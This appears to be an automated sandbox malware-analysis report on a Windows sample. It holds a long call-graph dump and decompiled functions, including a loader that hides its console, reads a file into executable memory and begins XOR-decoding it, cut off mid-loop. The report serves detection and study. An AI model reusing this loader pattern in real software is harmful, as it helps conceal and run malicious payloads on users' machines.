LeaveCriticalSection 10333->10336 10335 4121e5 10335->10319 10335->10326 10336->10335 10338 40fd4a pre_c_initialization 37 API calls 10337->10338 10339 410bb6 10338->10339 10342 410ac4 10339->10342 10343 410ad0 ___scrt_is_nonwritable_in_current_image 10342->10343 10349 410aea 10343->10349 10353 4113bc EnterCriticalSection 10343->10353 10345 410afa 10351 40f5c1 ___vcrt_freefls@4 14 API calls 10345->10351 10352 410b26 10345->10352 10347 40f649 pre_c_initialization 37 API calls 10350 410b63 10347->10350 10348 410af1 10348->10204 10349->10347 10349->10348 10351->10352 10354 410b43 10352->10354 10353->10345 10357 411404 LeaveCriticalSection 10354->10357 10356 410b4a 10356->10349 10357->10356 10358->10164 10360 4074ca 10359->10360 10361 4074d6 ___scrt_uninitialize_crt 10359->10361 10360->10361 10363 4074f8 10360->10363 10375 407060 10360->10375 10361->10077 10363->10361 10364 40756c WriteFile 10363->10364 10364->10361 10365 40758c GetLastError 10364->10365 10365->10361 10367 4069c0 10366->10367 10372 406a67 10366->10372 10368 406a69 10367->10368 10371 4069cf 10367->10371 10370 4074c0 4 API calls 10368->10370 10369 4046c0 10369->10080 10370->10372 10373 4074c0 4 API calls 10371->10373 10372->10369 10374 4074c0 4 API calls 10372->10374 10373->10372 10374->10369 10376 40707b 10375->10376 10377 40706f 10375->10377 10376->10363 10377->10376 10378 40707d WriteFile 10377->10378 10378->10376 10379 4070a9 GetLastError 10378->10379 10379->10376 10403 40d210 10380->10403 10384 4067a3 ___scrt_fastfail 10383->10384 10385 4067e5 EnumFontFamiliesExW 10384->10385 10386 40680c ___scrt_uninitialize_crt 10384->10386 10385->10384 10385->10386 10405 405cf0 10386->10405 10388 40689d 10388->10094 10390 401cc9 10389->10390 10391 40dc06 15 API calls 10390->10391 10392 401e78 _memcmp 10390->10392 10400 401d71 ___scrt_fastfail 10391->10400 10394 4020a8 10392->10394 10453 4075b0 10392->10453 10457 407b50 10394->10457 10399 401e69 10402 40dbeb 14 API calls 10399->10402 10400->10392 10400->10399 10401 40dbeb 14 API calls 10400->10401 10401->10400 10402->10392 10404 404ba6 GetDpiForSystem MulDiv GetDpiForSystem MulDiv 10403->10404 10404->10090 10406 405cfc RegCreateKeyW 10405->10406 10407 405d2f 10405->10407 10408 405d12 10406->10408 10409 405d14 10406->10409 10410 405d50 28 API calls 10407->10410 10412 405d3e RegCloseKey 10408->10412 10414 405d50 10409->10414 10410->10412 10412->10388 10415 405d5f 10414->10415 10418 405d6d 10414->10418 10416 404b80 4 API calls 10415->10416 10416->10418 10417 405dea 10419 405dfe RegSetValueExW 10417->10419 10422 405e20 10417->10422 10418->10417 10420 405da8 wsprintfW RegSetValueExW 10418->10420 10419->10422 10420->10418 10421 405e34 RegSetValueExW 10423 405e56 10421->10423 10422->10421 10422->10423 10424 405e6a RegSetValueExW 10423->10424 10425 405e8f 10423->10425 10424->10425 10426 405e95 lstrcmpW 10425->10426 10427 405ead lstrlenW RegSetValueExW 10425->10427 10426->10427 10428 405edf 10426->10428 10427->10428 10429 405ef3 RegSetValueExW 10428->10429 10430 405f18 10428->10430 10429->10430 10431 405f3a GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 10430->10431 10432 405fa5 10430->10432 10431->10432 10433 405fb9 RegSetValueExW 10432->10433 10434 405fde 10432->10434 10433->10434 10435 405ff2 RegSetValueExW 10434->10435 10436 406014 10434->10436 10435->10436 10437 406025 RegSetValueExW 10436->10437 10438 406047 10436->10438 10437->10438 10439 406058 RegSetValueExW 10438->10439 10440 40607a 10438->10440 10439->10440 10441 40608b RegSetValueExW 10440->10441 10442 4060ad 10440->10442 10441->10442 10443 4060c1 RegSetValueExW 10442->10443 10444 4060e3 10442->10444 10443->10444 10445 4060f4 RegSetValueExW 10444->10445 10446 406116 10444->10446 10445->10446 10447 406132 RegSetValueExW 10446->10447 10448 406171 10446->10448 10447->10448 10449 406185 RegSetValueExW 10448->10449 10450 4061a7 10448->10450 10449->10450 10451 4061c3 RegSetValueExW 10450->10451 10452 405d23 RegCloseKey 10450->10452 10451->10452 10452->10408 10454 4075cf 10453->10454 10498 406360 10454->10498 10458 407b85 10457->10458 10459 407bc7 10457->10459 10458->10459 10461 407d28 10458->10461 10462 407baf IsWindowVisible 10458->10462 10460 407d0f 10459->10460 10465 407c24 GetDC 10459->10465 10528 4034b0 SetRect 10460->10528 10464 407d8b GetWindowLongW AdjustWindowRect 10461->10464 10469 407fd4 10461->10469 10462->10459 10462->10461 10466 407e18 GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10464->10466 10467 407e7a ShowScrollBar 10464->10467 10468 407c42 CreateCompatibleBitmap ReleaseDC SelectObject 10465->10468 10493 4020b1 10465->10493 10470 407e8e 10466->10470 10467->10470 10471 407cb8 DeleteObject 10468->10471 10472 407ccb SetRect 10468->10472 10475 408008 ScrollWindow SetScrollPos SetScrollPos InvalidateRect 10469->10475 10478 4080ba 10469->10478 10473 407e9c GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10470->10473 10474 407efe ShowScrollBar 10470->10474 10471->10472 10515 4038d0 10472->10515 10477 407f12 SetWindowPos SystemParametersInfoW GetSystemMetrics InvalidateRect UpdateWindow 10473->10477 10474->10477 10475->10478 10477->10478 10479 40820c 10478->10479 10480 4038d0 19 API calls 10478->10480 10481 408247 10479->10481 10530 406e10 10479->10530 10483 4081cd 10480->10483 10484 40825e GetFocus 10481->10484 10490 4082d5 10481->10490 10529 4034b0 SetRect 10483->10529 10486 408284 10484->10486 10484->10490 10488 408293 CreateCaret 10486->10488 10489 4082d7 DestroyCaret 10486->10489 10487 4081e6 InvalidateRect UpdateWindow 10487->10479 10539 4083f0 10488->10539 10489->10490 10492 4083f0 3 API calls 10490->10492 10490->10493 10492->10493 10494 405060 10493->10494 10496 40506f 10494->10496 10495 4020bd 10495->10086 10496->10495 10544 40a190 10496->10544 10499 40646a GetDC 10498->10499 10506 40638b _memcmp 10498->10506 10500 40648a CreateFontIndirectW 10499->10500 10501 406460 10499->10501 10502 4064b8 SelectObject GetTextMetricsW 10500->10502 10503 40649d ReleaseDC 10500->10503 10501->10394 10504 4064ea GetTextFaceW SelectObject ReleaseDC 10502->10504 10503->10501 10505 40dbeb 14 API calls 10504->10505 10507 40655a 10505->10507 10506->10499 10506->10501 10508 40dc06 15 API calls 10507->10508 10509 40656b ___scrt_uninitialize_crt 10508->10509 10510 406590 GetCPInfo 10509->10510 10511 4065ab 10510->10511 10512 4065ca DeleteObject 10511->10512 10513 4065dd 10511->10513 10512->10513 10513->10501 10514 40660a DeleteObject 10513->10514 10514->10501 10516 4038e5 10515->10516 10519 4038f4 10515->10519 10517 40dc06 15 API calls 10516->10517 10516->10519 10518 40390e 10517->10518 10518->10519 10520 40dc06 15 API calls 10518->10520 10519->10460 10521 403937 SelectObject 10520->10521 10526 40396a 10521->10526 10522 4039f5 SelectObject 10523 40dbeb 14 API calls 10522->10523 10525 403a14 10523->10525 10524 40399c SetBkColor SetTextColor 10524->10526 10527 40dbeb 14 API calls 10525->10527 10526->10522 10526->10524 10527->10519 10528->10461 10529->10487 10531 406e46 10530->10531 10532 406e2f GetFocus 10530->10532 10534 406e55 DeleteObject 10531->10534 10537 406e68 10531->10537 10532->10531 10533 406e40 DestroyCaret 10532->10533 10533->10531 10534->10537 10535 406ed4 10535->10481 10536 406fc1 CreateBitmap 10538 40dbeb 14 API calls 10536->10538 10537->10535 10537->10536 10538->10535 10540 408410 10539->10540 10541 4083ff GetFocus 10539->10541 10540->10490 10541->10540 10542 408412 10541->10542 10543 408441 SetCaretPos ShowCaret 10542->10543 10543->10540 10545 40a1a3 10544->10545 10549 40a19c 10544->10549 10546 40a1d0 ___scrt_uninitialize_crt 10545->10546 10550 40dc11 10545->10550 10546->10549 10563 405270 10546->10563 10549->10495 10551 40f727 10550->10551 10552 40f734 10551->10552 10553 40f73f 10551->10553 10554 40f5fb __onexit 15 API calls 10552->10554 10555 40f747 10553->10555 10561 40f750 pre_c_initialization 10553->10561 10559 40f73c 10554->10559 10556 40f5c1 ___vcrt_freefls@4 14 API calls 10555->10556 10556->10559 10557 40f755 10560 40f9f9 __dosmaperr 14 API calls 10557->10560 10558 40f77a HeapReAlloc 10558->10559 10558->10561 10559->10546 10560->10559 10561->10557 10561->10558 10562 4127fd pre_c_initialization 2 API calls 10561->10562 10562->10561 10579 4052b1 10563->10579 10564 4054c8 10565 40556a 10564->10565 10587 407750 10564->10587 10567 4055c0 10565->10567 10568 4055a0 10565->10568 10570 4055af 10565->10570 10578 405575 ___scrt_fastfail 10565->10578 10569 4055e2 10567->10569 10608 401b20 10567->10608 10571 402fa0 16 API calls 10568->10571 10614 402e30 10569->10614 10575 40dbeb 14 API calls 10570->10575 10571->10570 10576 4056af 10575->10576 10577 40dbeb 14 API calls 10576->10577 10577->10578 10578->10549 10579->10564 10580 402fa0 10579->10580 10581 402fb5 ___scrt_uninitialize_crt 10580->10581 10582 402fba 10580->10582 10581->10579 10583 403041 10582->10583 10584 402fc3 10582->10584 10583->10581 10586 402e30 16 API calls 10583->10586 10585 402e30 16 API calls 10584->10585 10585->10581 10586->10581 10618 4034b0 SetRect 10587->10618 10589 40777c 10591 40790e 10589->10591 10619 404660 10589->10619 10595 40797e 10591->10595 10627 404fe0 10591->10627 10593 407a31 10594 407a5c 10593->10594 10597 406d30 4 API calls 10593->10597 10653 407430 10594->10653 10595->10593 10596 407a24 10595->10596 10633 406d30 10595->10633 10641 4075f0 10596->10641 10597->10594 10602 40781d 10602->10591 10623 40a060 10602->10623 10605 407799 10605->10602 10607 40a060 8 API calls 10605->10607 10607->10605 10609 401b32 10608->10609 10611 401b37 _memcmp 10608->10611 10609->10569 10610 40dc06 15 API calls 10612 401bb7 ___scrt_uninitialize_crt 10610->10612 10611->10609 10611->10610 10612->10609 10613 40dbeb 14 API calls 10612->10613 10613->10609 10615 402e50 10614->10615 10616 402e57 10614->10616 10615->10570 10617 40dc11 16 API calls 10616->10617 10617->10615 10618->10589 10620 40467f 10619->10620 10621 40466f 10619->10621 10620->10605 10622 4074c0 4 API calls 10621->10622 10622->10620 10624 40a074 10623->10624 10625 404fe0 8 API calls 10624->10625 10626 40a0a9 10624->10626 10625->10626 10626->10602 10628 404ff2 10627->10628 10629 405037 SetRect 10628->10629 10630 405028 10628->10630 10632 405035 10629->10632 10631 4075f0 7 API calls 10630->10631 10631->10632 10632->10595 10634 406d44 10633->10634 10635 406da8 10633->10635 10639 4074c0 4 API calls 10634->10639 10637 4074c0 4 API calls 10635->10637 10640 406d9a 10635->10640 10637->10635 10639->10640 10669 406b50 10640->10669 10642 4075ff 10641->10642 10643 40761e 10642->10643 10644 407631 10642->10644 10645 407645 10642->10645 10643->10593 10678 408480 10644->10678 10645->10643 10647 404660 4 API calls 10645->10647 10651 407663 10647->10651 10648 407738 10682 4034b0 SetRect 10648->10682 10650 406b50 4 API calls 10650->10651 10651->10648 10651->10650 10652 4074c0 WriteFile GetLastError WriteFile GetLastError 10651->10652 10652->10651 10654 407441 10653->10654 10655 40743f 10653->10655 10656 407498 10654->10656 10657 40744d 10654->10657 10664 408370 10655->10664 10658 404660 4 API calls 10656->10658 10662 407489 10656->10662 10660 406b50 4 API calls 10657->10660 10658->10662 10659 407060 2 API calls 10659->10655 10661 40746d 10660->10661 10661->10662 10663 4074c0 4 API calls 10661->10663 10662->10659 10663->10662 10665 408387 10664->10665 10666 407a74 10664->10666 10665->10666 10667 4083c8 PostMessageW 10665->10667 10668 4083ae SetTimer 10665->10668 10666->10565 10667->10666 10668->10666 10671 406b64 10669->10671 10670 406b72 10670->10596 10671->10670 10672 406cb3 10671->10672 10673 406bdc 10671->10673 10675 406b8e 10671->10675 10674 404660 4 API calls 10672->10674 10672->10675 10673->10675 10677 4074c0 4 API calls 10673->10677 10674->10675 10675->10670 10676 4074c0 4 API calls 10675->10676 10676->10670 10677->10675 10679 4084a1 10678->10679 10680 408370 2 API calls 10679->10680 10681 408547 10680->10681 10681->10643 10682->10643 10684 401adf 10683->10684 10686 401aef 10683->10686 10685 40dc11 16 API calls 10684->10685 10685->10686 10686->10122 10688 4056f4 10687->10688 10689 404e1f LeaveCriticalSection 10688->10689 10690 401ad0 16 API calls 10688->10690 10689->10122 10689->10128 10690->10688 10692 40f501 10691->10692 10693 40f513 ___scrt_uninitialize_crt 10691->10693 10694 40f50f 10692->10694 10696 412e16 10692->10696 10693->9890 10694->9890 10699 412cc4 10696->10699 10702 412c18 10699->10702 10703 412c24 ___scrt_is_nonwritable_in_current_image 10702->10703 10710 4113bc EnterCriticalSection 10703->10710 10705 412c2e ___scrt_uninitialize_crt 10706 412c9a 10705->10706 10711 412b8c 10705->10711 10719 412cb8 10706->10719 10710->10705 10712 412b98 ___scrt_is_nonwritable_in_current_image 10711->10712 10722 412f33 EnterCriticalSection 10712->10722 10714 412ba2 ___scrt_uninitialize_crt 10715 412bee 10714->10715 10723 412dce 10714->10723 10733 412c0c 10715->10733 10866 411404 LeaveCriticalSection 10719->10866 10721 412ca6 10721->10694 10722->10714 10724 412de4 10723->10724 10725 412ddb 10723->10725 10736 412d69 10724->10736 10727 412cc4 ___scrt_uninitialize_crt 66 API calls 10725->10727 10728 412de1 10727->10728 10728->10715 10731 412e00 10749 413f6f 10731->10749 10865 412f47 LeaveCriticalSection 10733->10865 10735 412bfa 10735->10705 10737 412d81 10736->10737 10738 412da6 10736->10738 10737->10738 10739 4134fd ___scrt_uninitialize_crt 25 API calls 10737->10739 10738->10728 10742 4134fd 10738->10742 10740 412d9f 10739->10740 10760 414767 10740->10760 10743 413509 10742->10743 10744 41351e 10742->10744 10745 40f9f9 __dosmaperr 14 API calls 10743->10745 10744->10731 10746 41350e 10745->10746 10747 40f93c pre_c_initialization 25 API calls 10746->10747 10748 413519 10747->10748 10748->10731 10750 413f80 10749->10750 10751 413f8d 10749->10751 10752 40f9f9 __dosmaperr 14 API calls 10750->10752 10753 413fd6 10751->10753 10756 413fb4 10751->10756 10759 413f85 10752->10759 10754 40f9f9 __dosmaperr 14 API calls 10753->10754 10755 413fdb 10754->10755 10757 40f93c pre_c_initialization 25 API calls 10755->10757 10834 413ecd 10756->10834 10757->10759 10759->10728 10761 414773 ___scrt_is_nonwritable_in_current_image 10760->10761 10762 414793 10761->10762 10763 41477b 10761->10763 10765 41482e 10762->10765 10769 4147c5 10762->10769 10785 40f9e6 10763->10785 10767 40f9e6 __dosmaperr 14 API calls 10765->10767 10770 414833 10767->10770 10768 40f9f9 __dosmaperr 14 API calls 10771 414788 10768->10771 10788 41159a EnterCriticalSection 10769->10788 10773 40f9f9 __dosmaperr 14 API calls 10770->10773 10771->10738 10775 41483b 10773->10775 10774 4147cb 10776 4147e7 10774->10776 10777 4147fc 10774->10777 10778 40f93c pre_c_initialization 25 API calls 10775->10778 10780 40f9f9 __dosmaperr 14 API calls 10776->10780 10789 414859 10777->10789 10778->10771 10782 4147ec 10780->10782 10781 4147f7 10831 414826 10781->10831 10783 40f9e6 __dosmaperr 14 API calls 10782->10783 10783->10781 10786 40fea1 __dosmaperr 14 API calls 10785->10786 10787 40f9eb 10786->10787 10787->10768 10788->10774 10790 41487b 10789->10790 10826 414897 10789->10826 10791 41487f 10790->10791 10794 4148cf 10790->10794 10792 40f9e6 __dosmaperr 14 API calls 10791->10792 10793 414884 10792->10793 10795 40f9f9 __dosmaperr 14 API calls 10793->10795 10796 4148e5 10794->10796 10797 414f55 ___scrt_uninitialize_crt 27 API calls 10794->10797 10799 41488c 10795->10799 10798 414400 ___scrt_uninitialize_crt 38 API calls 10796->10798 10797->10796 10800 4148ee 10798->10800 10801 40f93c pre_c_initialization 25 API calls 10799->10801 10802 4148f3 10800->10802 10803 41492c 10800->10803 10801->10826 10804 4148f7 10802->10804 10805 414919 10802->10805 10806 414940 10803->10806 10807 414986 WriteFile 10803->10807 10810 4149f3 10804->10810 10815 414398 ___scrt_uninitialize_crt 6 API calls 10804->10815 10811 413fec ___scrt_uninitialize_crt 43 API calls 10805->10811 10808 414976 10806->10808 10809 414948 10806->10809 10812 4149a9 GetLastError 10807->10812 10817 41490f 10807->10817 10816 414471 ___scrt_uninitialize_crt 7 API calls 10808->10816 10813 414966 10809->10813 10814 41494d 10809->10814 10819 40f9f9 __dosmaperr 14 API calls 10810->10819 10810->10826 10811->10817 10812->10817 10818 414635 ___scrt_uninitialize_crt 8 API calls 10813->10818 10814->10810 10821 41454c ___scrt_uninitialize_crt 7 API calls 10814->10821 10815->10817 10816->10817 10817->10810 10820 4149c9 10817->10820 10817->10826 10818->10817 10822 414a14 10819->10822 10823 4149d0 10820->10823 10824 4149e7 10820->10824 10821->10817 10825 40f9e6 __dosmaperr 14 API calls 10822->10825 10827 40f9f9 __dosmaperr 14 API calls 10823->10827 10828 40f9c3 __dosmaperr 14 API calls 10824->10828 10825->10826 10826->10781 10829 4149d5 10827->10829 10828->10826 10830 40f9e6 __dosmaperr 14 API calls 10829->10830 10830->10826 10832 4115bd ___scrt_uninitialize_crt LeaveCriticalSection 10831->10832 10833 41482c 10832->10833 10833->10771 10835 413ed9 ___scrt_is_nonwritable_in_current_image 10834->10835 10848 41159a EnterCriticalSection 10835->10848 10837 413ee8 10838 413f2f 10837->10838 10849 411671 10837->10849 10839 40f9f9 __dosmaperr 14 API calls 10838->10839 10841 413f34 10839->10841 10862 413f63 10841->10862 10842 413f14 FlushFileBuffers 10842->10841 10843 413f20 10842->10843 10844 40f9e6 __dosmaperr 14 API calls 10843->10844 10846 413f25 GetLastError 10844->10846 10846->10838 10848->10837 10850 411693 10849->10850 10851 41167e 10849->10851 10853 40f9e6 __dosmaperr 14 API calls 10850->10853 10857 4116b8 10850->10857 10852 40f9e6 __dosmaperr 14 API calls 10851->10852 10854 411683 10852->10854 10855 4116c3 10853->10855 10856 40f9f9 __dosmaperr 14 API calls 10854->10856 10858 40f9f9 __dosmaperr 14 API calls 10855->10858 10859 41168b 10856->10859 10857->10842 10860 4116cb 10858->10860 10859->10842 10861 40f93c pre_c_initialization 25 API calls 10860->10861 10861->10859 10863 4115bd ___scrt_uninitialize_crt LeaveCriticalSection 10862->10863 10864 413f4c 10863->10864 10864->10759 10865->10735 10866->10721

                                                  Executed Functions

                                                  Function 00B80227 Relevance: 16.3, APIs: 4, Strings: 5, Instructions: 568fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 145 b80227-b80338 call b80005 call b800e4 * 8 164 b8033b-b8037b 145->164 165 b80384-b80388 164->165 166 b8038a-b803ac 165->166 167 b803ae-b803c6 165->167 166->165 169 b803c8-b803e0 167->169 170 b8042e-b80435 167->170 169->170 171 b803e2-b803f8 169->171 170->164 171->170 172 b803fa-b80412 171->172 172->170 173 b80414-b8042c 172->173 173->170 174 b8043a-b8044b 173->174 176 b8044d 174->176 177 b80452-b80462 174->177 178 b8091c-b8091d 176->178 180 b80469-b8048c CreateFileW 177->180 181 b80464 177->181 182 b8048e 180->182 183 b80493-b804c4 VirtualAlloc ReadFile 180->183 181->178 182->178 185 b804cb-b804de 183->185 186 b804c6 183->186 188 b80902 185->188 189 b804e4-b808fd 185->189 186->178 190 b80906-b80915 call b8091e 188->190 193 b80917-b80919 ExitProcess 190->193
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00B80482
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: -$;$A$r$s
                                                  • API String ID: 823142352-4219510768
                                                  • Opcode ID: 428cdf327bb76c5bf72ad432bf22704b14a04167fdbc86dd9b1d21022162ed40
                                                  • Instruction ID: d83e283039846e34fc19302433a14143dc048b672769fdd49356e1cc2e5e5486
                                                  • Opcode Fuzzy Hash: 428cdf327bb76c5bf72ad432bf22704b14a04167fdbc86dd9b1d21022162ed40
                                                  • Instruction Fuzzy Hash: 2232A820D5D2D8ADDF06DBE984517FDBFB09F26202F1840DAE5E1E6283C136874ADB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AB9E Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 562 40ab9e-40aba9 SetUnhandledExceptionFilter
                                                  C-Code - Quality: 100%
                                                  			E0040AB9E() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040ABAA); // executed
				return _t1;
			}




                                                  0x0040aba3
                                                  0x0040aba9

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNELBASE(Function_0000ABAA,0040A51E), ref: 0040ABA3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 8242c043f70ff0fce9602e40a3c009c5e4c33ac9d99312ea9adff4681cf96eb8
                                                  • Instruction ID: 0e5e69ea80962e3745035f55731dfb63affe3dee562107f3db3c1ad63ce48973
                                                  • Opcode Fuzzy Hash: 8242c043f70ff0fce9602e40a3c009c5e4c33ac9d99312ea9adff4681cf96eb8
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409720 Relevance: 23.4, APIs: 12, Strings: 1, Instructions: 660filememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 409720-409783 GetConsoleWindow ShowWindow call 40dc06 3 409785-409787 0->3 4 40978c-409803 call 40d210 CreateFileW GetFileSize VirtualAlloc ReadFile 0->4 5 40a05a-40a05d 3->5 8 409809-4099b0 4->8 9 4099b2 8->9 10 4099b7-4099c7 EnumSystemCodePagesW call 40dbeb 8->10 9->8 12 4099cc-4099d6 10->12 13 4099e1-4099e7 12->13 14 4099f5-409a33 GetOEMCP call 40dbe0 13->14 15 4099e9-4099f3 13->15 19 409a35-409a3a 14->19 20 409a3f-409a46 14->20 15->13 19->5 21 409a51-409a57 20->21 22 409ed0-409ed7 21->22 23 409a5d-409a6d 21->23 25 409ee3-409ee7 22->25 26 409ed9-409ede 22->26 24 409a70-409a80 23->24 29 409a82-409a87 24->29 30 409ab5-409aba 24->30 27 409ef0-409ef4 25->27 28 409ee9 25->28 26->5 31 409ef6 27->31 32 409efd-409f1d call 402960 27->32 28->27 33 409a89-409a9b 29->33 34 409aac-409ab3 29->34 35 409abd-409acd 30->35 31->32 43 409f29-409f2d 32->43 44 409f1f-409f24 32->44 33->30 37 409a9d-409aaa 33->37 34->35 38 409adb-409aeb 35->38 39 409acf-409ad6 35->39 37->24 37->34 42 409aee-409afe 38->42 39->21 45 409b00-409b05 42->45 46 409b33-409b38 42->46 48 409f97-409fa3 call 4046f0 43->48 49 409f2f-409f50 GetStdHandle * 2 43->49 44->5 50 409b07-409b19 45->50 51 409b2a-409b31 45->51 47 409b3b-409b4b 46->47 53 409b6d-409b7d 47->53 54 409b4d-409b61 47->54 63 409fa5-409faa 48->63 64 409faf-409fcb GetStartupInfoW 48->64 56 409f52-409f59 49->56 57 409f5b-409f6c call 404690 49->57 50->46 52 409b1b-409b28 50->52 51->47 52->42 52->51 59 409b80-409b90 53->59 54->53 56->57 60 409f88 56->60 73 409f86 57->73 74 409f6e-409f7a call 4034e0 57->74 65 409b92-409b97 59->65 66 409bc5-409bca 59->66 62 409f92 60->62 68 40a049-40a050 62->68 63->5 69 409fd1-409fe4 64->69 70 409b99-409bab 65->70 71 409bbc-409bc3 65->71 72 409bcd-409bdd 66->72 68->5 75 40a055 call 404ca0 68->75 69->69 76 409fe6-40a01a call 406640 69->76 70->66 77 409bad-409bba 70->77 71->72 78 409c46-409c56 72->78 79 409bdf-409bee 72->79 73->62 74->73 86 409f7c-409f81 74->86 75->5 95 40a02b 76->95 96 40a01c-40a029 76->96 77->59 77->71 81 409c59-409c69 78->81 83 409bf0-409bf5 79->83 84 409bfa-409c19 call 40e35e 79->84 88 409ca1-409ca6 81->88 89 409c6b-409c70 81->89 83->5 99 409c24-409c2b 84->99 100 409c1b-409c22 84->100 86->5 91 409cac-409cbf 88->91 93 409c72-409c84 89->93 94 409c95-409c9f 89->94 97 409cc1-409cd0 91->97 98 409d28-409d38 91->98 93->88 101 409c86-409c93 93->101 94->91 102 40a035-40a043 ShowWindow 95->102 96->102 103 409cd2-409cd7 97->103 104 409cdc-409cfb call 40e35e 97->104 107 409d3b-409d4b 98->107 105 409c37-409c3c 99->105 106 409c2d-409c35 99->106 100->99 100->105 101->81 101->94 102->68 103->5 119 409d06-409d0d 104->119 120 409cfd-409d04 104->120 105->5 106->105 109 409c41 106->109 110 409d83-409d88 107->110 111 409d4d-409d52 107->111 109->78 112 409d8e-409da1 110->112 114 409d54-409d66 111->114 115 409d77-409d81 111->115 117 409da3-409db2 112->117 118 409df5-409e05 112->118 114->110 116 409d68-409d75 114->116 115->112 116->107 116->115 121 409db4-409db9 117->121 122 409dbe-409de4 call 40e35e 117->122 125 409e08-409e18 118->125 123 409d19-409d1e 119->123 124 409d0f-409d17 119->124 120->119 120->123 121->5 137 409df0 122->137 138 409de6-409deb 122->138 123->5 124->123 127 409d23 124->127 128 409e50-409e55 125->128 129 409e1a-409e1f 125->129 127->98 130 409e5b-409e6e 128->130 132 409e21-409e33 129->132 133 409e44-409e4e 129->133 135 409e70-409e7f 130->135 136 409ec1-409ec6 130->136 132->128 134 409e35-409e42 132->134 133->130 134->125 134->133 139 409e81-409e86 135->139 140 409e8b-409eb0 call 40e35e 135->140 136->5 137->118 138->5 139->5 143 409eb2-409eb7 140->143 144 409ebc 140->144 143->5 144->136
                                                  C-Code - Quality: 88%
                                                  			E00409720(struct HWND__* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				signed short* _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				int _v32;
				signed int _v36;
				char* _v40;
				char* _v44;
				signed int _v48;
				char* _v52;
				signed int _v56;
				char* _v60;
				signed int _v64;
				signed int _v68;
				char* _v72;
				signed int _v76;
				char* _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				long _v112;
				signed int _v116;
				void* _v120;
				int _v124;
				int _v128;
				int _v132;
				int _v136;
				int _v140;
				int _v144;
				int _v148;
				int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				int _v188;
				long _v192;
				struct _STARTUPINFOW _v260;
				int _t347;
				void* _t351;
				void* _t353;
				signed int _t402;
				signed int _t404;
				signed int _t418;
				short _t423;
				signed int _t428;
				signed int _t429;
				short _t433;
				signed int _t436;
				signed int _t437;
				signed int _t441;
				signed int _t444;
				int _t449;
				short _t452;
				signed int _t456;
				signed int _t463;
				short _t468;
				intOrPtr _t518;
				signed int _t528;
				signed int _t529;
				short _t531;
				signed int _t534;
				signed int _t535;
				short _t539;
				short _t543;
				short _t554;
				intOrPtr _t600;
				signed int _t603;
				struct HWND__* _t609;
				signed int _t611;
				signed int _t612;
				short _t614;
				short _t619;
				signed int _t622;
				signed int _t623;
				short _t636;
				short _t642;
				signed int _t644;
				void* _t646;
				void* _t647;
				void* _t648;
				void* _t649;
				void* _t650;

				_t645 = __edi;
				_v116 = 0;
				_v24 = 0;
				_v20 = 0;
				_v152 = 0;
				_v188 = 0;
				_v8 = 0;
				_v32 = 0;
				__imp__GetConsoleWindow(); // executed
				ShowWindow(__eax, 0); // executed
				_push(0x3d0900); // executed
				_t347 = E0040DC06(); // executed
				_t647 = _t646 + 4;
				_v32 = _t347;
				if(_v32 != 0) {
					E0040D210(__edi, _v32, 0x54, 0x3d0900);
					_t648 = _t647 + 0xc;
					__eflags = 4;
					_t351 = CreateFileW( *(_a8 + (4 << 0)), 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_v120 = _t351;
					_v112 = GetFileSize(_v120, 0);
					_t353 = VirtualAlloc(0, _v112, 0x3000, 0x40); // executed
					_v12 = _t353;
					ReadFile(_v120, _v12, _v112,  &_v192, 0); // executed
					while(1) {
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
						 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x000000a5;
